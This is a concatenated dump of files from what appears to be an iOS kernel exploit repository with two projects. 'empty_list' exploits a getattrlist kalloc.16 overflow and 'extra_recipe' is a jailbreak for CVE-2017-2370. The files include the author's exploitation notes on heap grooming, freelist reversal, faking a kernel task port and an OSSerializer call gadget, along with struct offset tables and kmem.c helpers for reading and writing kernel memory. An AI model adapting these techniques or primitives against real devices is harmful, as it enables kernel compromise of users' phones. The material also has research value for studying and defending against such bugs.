ATTR_MAX_BUFFER) { 16 | error = ENOMEM; 17 | VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER); 18 | goto out; 19 | } 20 | MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK); 21 | 22 | Note that the only bound enforced here is the upper limit (ATTR_MAX_BUFFER); there is no lower bound, so a tiny bufferSize yields a tiny, zero-filled kernel allocation. The problem is that the code doesn't then correctly handle the case when the user-supplied buffer size 23 | is smaller than the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code: 24 | 25 | /* Return attribute set output if requested.
*/ 26 | if (return_valid) { 27 | ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS; 28 | if (pack_invalid) { 29 | /* Only report the attributes that are valid */ 30 | ab.actual.commonattr &= ab.valid.commonattr; 31 | ab.actual.volattr &= ab.valid.volattr; 32 | } 33 | bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual)); 34 | } 35 | 36 | There's no check that the allocated buffer is big enough to hold at least that. 37 | 38 | Exploitation: 39 | I hope to publish a longer-form write up of this, these are some rough notes on how the exploit works: 40 | 41 | The bug gives you the ability to write 8 zero bytes off the end of a kalloc.16 allocation. Whilst it looks like you 42 | might be able to control a few bits in those bytes I'm not sure you actually can so I focused on exploiting 43 | as if it was writing a NULL pointer off the end. 44 | 45 | This is pretty limited primitive so the first step is to try to enumerate possible things you could do: 46 | * target a reference count, trying to turn the overflow into a UaF bug 47 | * target a lock, trying to turn the overflow into a race condition bug 48 | * target a pointer, trying to leak a reference count 49 | * target a validated datastructure where 0 is an interesting value to change something to 50 | 51 | In the end I chose the first option. There are then two further requirements: 52 | * target needs a reference count in the first 8 bytes 53 | * target has to be overflowable into from kalloc.16 54 | 55 | I chose to target struct ipc_port, which has a reference count field as its second dword thus fulfilling the 56 | first requirement. It is however not allocated in kalloc.16; instead it lives in its own zone (ipc_ports.) 57 | 58 | This means we have to aligned a kalloc.16 zone block just before an ipc_ports one, then overflow out of the 59 | last kalloc.16 allocation in the kalloc.16 block into the first on in ipc_ports. 
60 | 61 | There are two tricks we can use to make this easier: 62 | 1) freelist reversal 63 | 2) safely-overflowable allocations 64 | 65 | Freelist Reversal: 66 | zone allocations will come first from intermediate (partially full) pages. This means that if we just start free'ing and 67 | allocating k.16 objects somewhere in the middle of the groom they won't be re-used until 68 | the current intermediate page is either full or empty. 69 | 70 | this provides a challenge because fresh page's freelist's are filled semi-randomly such that 71 | their allocations will go from the inside to the outside: 72 | 73 | | 9 8 6 5 2 1 3 4 7 10 | <-- example "randomized" allocation order from a fresh all-free page 74 | 75 | this means that our final intermediate k.16 and ports pages will look a bit like this: 76 | 77 | | - - - 5 2 1 3 4 - - | - - - 4 1 2 3 5 - - | 78 | kalloc.16 ipc_ports 79 | 80 | if we use the overflow to corrupt a freelist entry we'll panic if it gets allocated, so we 81 | need to avoid that 82 | 83 | the trick is that by controlling the allocation and free order we can reverse the freelists such that 84 | the final intermediate pages will look more like this: 85 | | 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 | 86 | kalloc.16 ipc_ports 87 | 88 | at this point we're much more likely to be able to free a kalloc.16 and realloc it for the overflow 89 | such that we can hit the first qword of an ipc_port. 90 | 91 | Safely-Overflowable allocations: 92 | since there are likely to be many candidate allocations we're gonna have to overflow out of before we hit the 93 | target one (which is right at the end, just before the ipc_port) we need to make sure that the allocated objects 94 | on the kalloc.16 page are safe to corrupt with a NULL pointer. 95 | 96 | I use mach message ool_port descriptors for this, as NULL is a valid value. 97 | 98 | Exploit Flow: 99 | We do the groom to reverse the kalloc.16 freelists and start trying to overflow into an ipc_port. 
100 | 101 | We know the approximate range of mach port names which contain the to-be-corrupted port; after each overflow attempt 102 | we check each of these ports to see if the port was corrupted. A side-effect of successful corruption is that the 103 | port's io_active flag will be set to zero. We can detect this without causing side-effects using the 104 | mach_port_kobject MIG method. 105 | 106 | Once we find the corrupted port we need to cause a reference to be taken and dropped on it; and more importantly we 107 | need the code path which does this to not check the io_active flag. mach_port_set_attributes will do this for us. 108 | 109 | Now we've turned our NULL pointer write off the end of a kalloc.16 into a dangling mach port :) 110 | 111 | We cause a zone gc, aiming to get the port's memory reused as a kalloc.4096 page. We first get it reused as a ool_ports 112 | descriptor where the ip_context field overlaps with a send right we send ourselves to a canary port. This lets us 113 | learn the approximate address of our objects in the kernel. We then replace the ool_desc with a pipe buffer, 114 | and with a bit of fiddling are able to work out where the dangling mach port is in memory. 115 | 116 | We craft a fake kernel task port in there then clean up. 117 | 118 | Reliability: 119 | The exploit does work, which was my goal :) Reliablilty is something like 30% maybe, it all hinges on how quickly you can do the initial overflow 120 | and test loop. If something else comes in and allocates or frees in kalloc.16 you increase the probability that you 121 | corrupt a freelist entry or something else and will panic. 122 | 123 | I'm sure the exploit can be made more reliable; I've only got it to the point where I've demonstrated that this 124 | bug is exploitable. If you want to take this as a starting point and demonstrate how to improve reliability I'd love 125 | to read a blog post! 
I imagine this would involve actually monitoring kalloc.16 allocations and understanding what 126 | the failure cases are and how they can be prevented. 127 | 128 | Success rates seem to be highest when the device has been rebooted and left idle for a bit. 129 | 130 | Cleanup: 131 | If the exploit does work it should clean up after itself and not panic the device. The fake kernel task port will stay alive. 132 | 133 | Use the functions in kmem.h to read and write kernel memory. Persist a send-right to tfp0 in there if you want to keep 134 | kernel memory access after this process exits. 135 | 136 | I've tested on: iPod Touch 6G, iPhone 6S, iPhone SE, iPhone 7, iPhone 8 137 | It should work on iOS 11 through iOS 11.3.1 138 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/ViewController.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface ViewController : UIViewController 4 | 5 | 6 | @end 7 | 8 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/ViewController.m: -------------------------------------------------------------------------------- 1 | #import "ViewController.h" 2 | 3 | @interface ViewController () 4 | 5 | @end 6 | 7 | @implementation ViewController 8 | 9 | - (void)viewDidLoad { 10 | [super viewDidLoad]; 11 | // Do any additional setup after loading the view, typically from a nib. 12 | } 13 | 14 | 15 | - (void)didReceiveMemoryWarning { 16 | [super didReceiveMemoryWarning]; 17 | // Dispose of any resources that can be recreated. 
18 | } 19 | 20 | 21 | @end 22 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/kmem.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "kmem.h" 7 | 8 | 9 | // Just setting a global var 10 | mach_port_t tfp0 = MACH_PORT_NULL; 11 | void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0) { 12 | tfp0 = fake_tfp0; 13 | } 14 | 15 | void wk32(uint64_t kaddr, uint32_t val) { 16 | if (tfp0 == MACH_PORT_NULL) { 17 | printf("attempt to write to kernel memory before any kernel memory write primitives available\n"); 18 | sleep(3); 19 | return; 20 | } 21 | 22 | kern_return_t err; 23 | err = mach_vm_write(tfp0, 24 | (mach_vm_address_t)kaddr, 25 | (vm_offset_t)&val, 26 | (mach_msg_type_number_t)sizeof(uint32_t)); 27 | 28 | if (err != KERN_SUCCESS) { 29 | printf("tfp0 write failed: %s %x\n", mach_error_string(err), err); 30 | return; 31 | } 32 | } 33 | 34 | void wk64(uint64_t kaddr, uint64_t val) { 35 | uint32_t lower = (uint32_t)(val & 0xffffffff); 36 | uint32_t higher = (uint32_t)(val >> 32); 37 | wk32(kaddr, lower); 38 | wk32(kaddr+4, higher); 39 | } 40 | 41 | uint32_t rk32(uint64_t kaddr) { 42 | kern_return_t err; 43 | uint32_t val = 0; 44 | mach_vm_size_t outsize = 0; 45 | err = mach_vm_read_overwrite(tfp0, 46 | (mach_vm_address_t)kaddr, 47 | (mach_vm_size_t)sizeof(uint32_t), 48 | (mach_vm_address_t)&val, 49 | &outsize); 50 | if (err != KERN_SUCCESS){ 51 | printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp0); 52 | sleep(3); 53 | return 0; 54 | } 55 | 56 | if (outsize != sizeof(uint32_t)){ 57 | printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize); 58 | sleep(3); 59 | return 0; 60 | } 61 | return val; 62 | } 63 | 64 | uint64_t rk64(uint64_t kaddr) { 65 | uint64_t lower = rk32(kaddr); 66 | uint64_t higher = rk32(kaddr+4); 67 | 
uint64_t full = ((higher<<32) | lower); 68 | return full; 69 | } 70 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/kmem.h: -------------------------------------------------------------------------------- 1 | #ifndef kmem_h 2 | #define kmem_h 3 | 4 | #include 5 | 6 | kern_return_t mach_vm_read( 7 | vm_map_t target_task, 8 | mach_vm_address_t address, 9 | mach_vm_size_t size, 10 | vm_offset_t *data, 11 | mach_msg_type_number_t *dataCnt); 12 | 13 | kern_return_t mach_vm_write( 14 | vm_map_t target_task, 15 | mach_vm_address_t address, 16 | vm_offset_t data, 17 | mach_msg_type_number_t dataCnt); 18 | 19 | kern_return_t mach_vm_read_overwrite( 20 | vm_map_t target_task, 21 | mach_vm_address_t address, 22 | mach_vm_size_t size, 23 | mach_vm_address_t data, 24 | mach_vm_size_t *outsize); 25 | 26 | extern mach_port_t tfp0; 27 | 28 | uint32_t rk32(uint64_t kaddr); 29 | uint64_t rk64(uint64_t kaddr); 30 | 31 | void wk32(uint64_t kaddr, uint32_t val); 32 | void wk64(uint64_t kaddr, uint64_t val); 33 | 34 | void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/main.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "AppDelegate.h" 3 | 4 | int main(int argc, char * argv[]) { 5 | @autoreleasepool { 6 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/offsets.h: -------------------------------------------------------------------------------- 1 | #ifndef offsets_h 2 | #define offsets_h 3 | 4 | enum kstruct_offset { 5 | /* struct task */ 6 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 7 | KSTRUCT_OFFSET_TASK_REF_COUNT, 8 | KSTRUCT_OFFSET_TASK_ACTIVE, 9 | 
KSTRUCT_OFFSET_TASK_VM_MAP, 10 | KSTRUCT_OFFSET_TASK_NEXT, 11 | KSTRUCT_OFFSET_TASK_PREV, 12 | KSTRUCT_OFFSET_TASK_ITK_SPACE, 13 | KSTRUCT_OFFSET_TASK_BSD_INFO, 14 | 15 | /* struct ipc_port */ 16 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 17 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 18 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_FLAGS, 19 | KSTRUCT_OFFSET_IPC_PORT_SET_ID, 20 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_NEXT, 21 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_PREV, 22 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 23 | KSTRUCT_OFFSET_IPC_PORT_RECEIVER_NAME, 24 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 25 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 26 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 27 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 28 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 29 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 30 | 31 | /* struct proc */ 32 | KSTRUCT_OFFSET_PROC_PID, 33 | KSTRUCT_OFFSET_PROC_P_FD, 34 | 35 | /* struct filedesc */ 36 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES, 37 | 38 | /* struct fileproc */ 39 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB, 40 | 41 | /* struct fileglob */ 42 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA, 43 | 44 | /* struct socket */ 45 | KSTRUCT_OFFSET_SOCKET_SO_PCB, 46 | 47 | /* struct pipe */ 48 | KSTRUCT_OFFSET_PIPE_BUFFER, 49 | 50 | /* struct ipc_space */ 51 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE, 52 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE, 53 | 54 | KFREE_ADDR_OFFSET, 55 | }; 56 | 57 | int koffset(enum kstruct_offset offset); 58 | void offsets_init(void); 59 | 60 | #endif 61 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/offsets.m: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "offsets.h" 10 | 11 | int* offsets = NULL; 12 | 13 | int kstruct_offsets[] = { 14 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 15 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT, 16 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE, 17 | 0x20, // 
KSTRUCT_OFFSET_TASK_VM_MAP, 18 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT, 19 | 0x30, // KSTRUCT_OFFSET_TASK_PREV, 20 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE 21 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO, 22 | 23 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 24 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 25 | 0x10, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_FLAGS, 26 | 0x18, // KSTRUCT_OFFSET_IPC_PORT_SET_ID, 27 | 0x30, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_NEXT 28 | 0x38, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_PREV 29 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 30 | 0x4c, // KSTRUCT_OFFSET_IPC_PORT_RECEIVER_NAME 31 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 32 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 33 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 34 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 35 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 36 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 37 | 38 | 0x10, // KSTRUCT_OFFSET_PROC_PID, 39 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD 40 | 41 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES 42 | 43 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB 44 | 45 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA 46 | 47 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB 48 | 49 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER 50 | 51 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE 52 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE 53 | 54 | 0x6c, // KFREE_ADDR_OFFSET 55 | }; 56 | 57 | 58 | int koffset(enum kstruct_offset offset) { 59 | if (offsets == NULL) { 60 | printf("need to call offsets_init() prior to querying offsets\n"); 61 | return 0; 62 | } 63 | return offsets[offset]; 64 | } 65 | 66 | // Checking iOS version 67 | void offsets_init() { 68 | if (@available(iOS 11.4, *)) { 69 | printf("this bug is patched in iOS 11.4 and above\n"); 70 | exit(EXIT_FAILURE); 71 | } else if (@available(iOS 11.0, *)) { 72 | printf("offsets selected for iOS 11.0 to 11.3.1\n"); 73 | offsets = kstruct_offsets; 74 | } else { 75 | printf("iOS version too low, 11.0 required\n"); 76 | exit(EXIT_FAILURE); 
77 | } 78 | } 79 | -------------------------------------------------------------------------------- /empty_list/empty_list/empty_list/sploit.h: -------------------------------------------------------------------------------- 1 | #ifndef sploit_h 2 | #define sploit_h 3 | 4 | void vfs_sploit(void); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/README.md: -------------------------------------------------------------------------------- 1 | A jailbreak. 2 | 3 | ##### Howto: 4 | 5 | Clean reboot the device, wait for a couple of minutes, start extra_recipe, wait for 5 seconds or so, then hit "go". 6 | If it says "failed, reboot" you should really reboot. Re-trying the same app will most likely encounter a kernel panic somewhere down the road. 7 | 8 | ##### Support: 9 | 10 | | Device | Version | 11 | |---------|----------| 12 | | iPhone 7/+ | iOS 10.0.0 -> iOS 10.1.1 | 13 | | iPhone 6S/+ (TSMC) | iOS 10.2 | 14 | | iPad Air 2 | iOS 10.2 | 15 | | iPad Mini 3 (WiFi) | iOS 10.2 | 16 | | iPhone 6 | iOS 10.2 | 17 | 18 | ##### Credits: 19 | 20 | * Ian Beer for the amazingly simple, yet awesome, kernel exploit 21 | * @qwertyoruiop for the amazingly complicated, yet effective, memprot bypass 22 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/extra_recipe.xcscheme: -------------------------------------------------------------------------------- 1 | 2 | 5 | 8 | 9 | 15 | 21 | 22 | 23 | 24 | 25 | 30 | 31 | 32 | 33 | 39 | 40 | 41 | 42 | 43 | 44 | 54 | 56 | 62 | 63 | 64 | 65 | 66 | 67 | 73 | 75 | 81 | 82 | 83 | 84 | 86 | 87 | 90 | 91 | 92 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | extra_recipe.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | SuppressBuildableAutocreation 14 | 15 | B0F37BBC1E361EAD00179E85 16 | 17 | primary 18 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/0.reload.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | 0.reload 7 | ProgramArguments 8 | 9 | /usr/libexec/reload 10 | 11 | RunAtLoad 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/AppDelegate.swift: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.swift 3 | // extra_recipe 4 | // 5 | // Created by Ian Beer on 1/23/17. 6 | // Copyright © 2017 Ian Beer. All rights reserved. 
7 | // 8 | 9 | import UIKit 10 | 11 | @UIApplicationMain 12 | class AppDelegate: UIResponder, UIApplicationDelegate { 13 | 14 | var window: UIWindow? 15 | 16 | 17 | func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool { 18 | // Override point for customization after application launch. 19 | return true 20 | } 21 | 22 | func applicationWillResignActive(_ application: UIApplication) { 23 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 24 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 25 | } 26 | 27 | func applicationDidEnterBackground(_ application: UIApplication) { 28 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 29 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 30 | } 31 | 32 | func applicationWillEnterForeground(_ application: UIApplication) { 33 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 34 | } 35 | 36 | func applicationDidBecomeActive(_ application: UIApplication) { 37 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 38 | } 39 | 40 | func applicationWillTerminate(_ application: UIApplication) { 41 | // Called when the application is about to terminate. 
Save data if appropriate. See also applicationDidEnterBackground:. 42 | } 43 | 44 | 45 | } 46 | 47 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "29x29", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "29x29", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "40x40", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "40x40", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "60x60", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "60x60", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "ipad", 35 | "size" : "29x29", 36 | "scale" : "1x" 37 | }, 38 | { 39 | "idiom" : "ipad", 40 | "size" : "29x29", 41 | "scale" : "2x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "40x40", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "40x40", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "76x76", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "76x76", 61 | "scale" : "2x" 62 | } 63 | ], 64 | "info" : { 65 | "version" : 1, 66 | "author" : "xcode" 67 | } 68 | } -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/Base.lproj/Main.storyboard: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 29 | 37 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/README: -------------------------------------------------------------------------------- 1 | // ianbeer 2 | 3 | kernel arbitrary read/write exploit for CVE-2017-2370 for iOS 10.2 4 | 5 | Only tested on iPod Touch 6G 14C92 - other devices/firmwares will not work out of the box! 6 | 7 | *** the bug *** 8 | mach_voucher_extract_attr_recipe_trap is a mach trap which can be called from any context. It's brand new code, added in iOS 10. 
9 | 10 | kern_return_t 11 | mach_voucher_extract_attr_recipe_trap(struct mach_voucher_extract_attr_recipe_args *args) 12 | { 13 | ipc_voucher_t voucher = IV_NULL; 14 | kern_return_t kr = KERN_SUCCESS; 15 | mach_msg_type_number_t sz = 0; 16 | 17 | if (copyin(args->recipe_size, (void *)&sz, sizeof(sz))) <---------- (a) 18 | return KERN_MEMORY_ERROR; 19 | 20 | if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE) 21 | return MIG_ARRAY_TOO_LARGE; 22 | 23 | voucher = convert_port_name_to_voucher(args->voucher_name); 24 | if (voucher == IV_NULL) 25 | return MACH_SEND_INVALID_DEST; 26 | 27 | mach_msg_type_number_t __assert_only max_sz = sz; 28 | 29 | if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) { 30 | /* keep small recipes on the stack for speed */ 31 | uint8_t krecipe[sz]; 32 | if (copyin(args->recipe, (void *)krecipe, sz)) { 33 | kr = KERN_MEMORY_ERROR; 34 | goto done; 35 | } 36 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 37 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 38 | assert(sz <= max_sz); 39 | 40 | if (kr == KERN_SUCCESS && sz > 0) 41 | kr = copyout(krecipe, (void *)args->recipe, sz); 42 | } else { 43 | uint8_t *krecipe = kalloc((vm_size_t)sz); <---------- (b) 44 | if (!krecipe) { 45 | kr = KERN_RESOURCE_SHORTAGE; 46 | goto done; 47 | } 48 | 49 | if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) { <----------- (c) 50 | kfree(krecipe, (vm_size_t)sz); 51 | kr = KERN_MEMORY_ERROR; 52 | goto done; 53 | } 54 | 55 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 56 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 57 | assert(sz <= max_sz); 58 | 59 | if (kr == KERN_SUCCESS && sz > 0) 60 | kr = copyout(krecipe, (void *)args->recipe, sz); 61 | kfree(krecipe, (vm_size_t)sz); 62 | } 63 | 64 | kr = copyout(&sz, args->recipe_size, sizeof(sz)); 65 | 66 | done: 67 | ipc_voucher_release(voucher); 68 | return kr; 69 | } 70 | 71 | 72 | Here's the argument structure (controlled from userspace) 73 | 74 | struct 
mach_voucher_extract_attr_recipe_args { 75 | PAD_ARG_(mach_port_name_t, voucher_name); 76 | PAD_ARG_(mach_voucher_attr_key_t, key); 77 | PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe); 78 | PAD_ARG_(user_addr_t, recipe_size); 79 | }; 80 | 81 | recipe and recipe_size are userspace pointers. 82 | 83 | At point (a) four bytes are read from the userspace pointer recipe_size into sz. 84 | 85 | At point (b) if sz was less than MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) and greater than MACH_VOUCHER_TRAP_STACK_LIMIT (256) 86 | sz is used to allocate a kernel heap buffer. 87 | 88 | At point (c) copyin is called again to copy userspace memory into that buffer which was just allocated, but rather than passing sz (the 89 | validate size which was allocated) args->recipe_size is passed as the size. This is the userspace pointer *to* the size, not the size! 90 | 91 | This leads to a completely controlled kernel heap overflow. Note that the code actually can't work properly :) 92 | 93 | *** the exploit *** 94 | 95 | I target preallocated mach message buffers which are allocated via kalloc. The first 4 bytes are a size field which is used to determine 96 | where in the buffer to read and write a message. By corrupting this field we can cause mach messages to be read and written outside the bounds of 97 | the kalloc allocation backing the kmsg. 98 | 99 | There is a slight complication in that a port's preallocated kmsg will only be used for actual mach_msg sends by the kernel (not for replies 100 | to MIG methods for example.) This makes it a bit trickier to get enough controlled content in them. 101 | 102 | One type of mach message which the kernel sends with a lot of user-controlled data is an exception message, sent when a thread crashes. 
103 | 104 | The file load_regs_and_crash.s contains ARM64 assembly which loads the ARM64 general purpose registers with the contents of a buffer 105 | such that when it crashes the exception message contains that data buffer (about 0x70 bytes are controlled.) 106 | 107 | By overwriting the port's ikm_size field to point to the header of another port we can read and write another port's header and learn where it is 108 | in memory. We can then free that second port and reallocate a user client in its place which we can also read and write. 109 | 110 | I read the userclients vtable pointer then use the OSSerializer::serialize gadget technique as detailed in 111 | [https://info.lookout.com/rs/051-ESQ-475/images/pegasus-exploits-technical-details.pdf] to call an arbitrary function with two controlled arguments. 112 | 113 | I call uuid_copy which calls memmove(arg0, arg1, 0x10). By pointing either arg0 or arg1 into the userclient itself (which we can read by receiving the 114 | exception message) we can read and write arbitrary kernel memory in 16 byte chunks. 115 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/ViewController.swift: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.swift 3 | // extra_recipe 